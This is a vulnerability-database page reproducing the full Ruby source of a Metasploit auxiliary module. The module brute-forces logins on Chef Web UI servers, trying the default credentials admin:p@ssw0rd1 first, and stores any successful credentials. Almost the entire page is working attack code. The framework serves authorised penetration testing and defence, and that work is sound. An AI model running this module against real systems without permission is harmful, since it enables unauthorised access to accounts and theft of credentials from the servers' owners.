Lucene search
K

Chef Web UI Brute Force Utility

🗓️ 18 Feb 2015 05:49:57Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 16 Views

This module attempts to login to Chef Web UI server instance using username and password combinations indicated by the options. It will also test for the default login (admin:p@ssw0rd1)

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/chef_webui'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Chef Web UI Brute Force Utility',
      'Description'    => %q{
        This module attempts to login to Chef Web UI server instance using username and password
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
        will also test for the default login (admin:p@ssw0rd1).
      },
      'Author'         =>
        [
          'hdm'
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
      {
        'SSL'         => true,
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
        OptString.new('TARGETURI', [ true,  'The path to the Chef Web UI application', '/']),
      ])
  end

  #
  # main
  #
  def run_host(ip)
    init_loginscanner(ip)
    msg = @scanner.check_setup
    if msg
      print_brute :level => :error, :ip => rhost, :msg => msg
      return
    end

    print_brute :level=>:status, :ip=>rhost, :msg=>("Found Chef Web UI application at #{datastore['TARGETURI']}")
    bruteforce(ip)
  end

  def bruteforce(ip)
    @scanner.scan! do |result|
      case result.status
        when Metasploit::Model::Login::Status::SUCCESSFUL
          print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
          do_report(ip, rport, result)
          :next_user
        when Metasploit::Model::Login::Status::DENIED_ACCESS
          print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"
          do_report(ip, rport, result)
          :next_user
        when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          if datastore['VERBOSE']
            print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
          end
          invalidate_login(
            address: ip,
            port: rport,
            protocol: 'tcp',
            public: result.credential.public,
            private: result.credential.private,
            realm_key: result.credential.realm_key,
            realm_value: result.credential.realm,
            status: result.status
          )
          :abort
        when Metasploit::Model::Login::Status::INCORRECT
          if datastore['VERBOSE']
            print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
          end
          invalidate_login(
            address: ip,
            port: rport,
            protocol: 'tcp',
            public: result.credential.public,
            private: result.credential.private,
            realm_key: result.credential.realm_key,
            realm_value: result.credential.realm,
            status: result.status
          )
      end
    end
  end

  def do_report(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: result.status
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def init_loginscanner(ip)
    @cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    # Always try the default first
    @cred_collection.prepend_cred(
      Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')
    )

    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(
      configure_http_login_scanner(
        uri:                datastore['TARGETURI'],
        cred_details:       @cred_collection,
        stop_on_success:    datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5,
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword']
      )
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation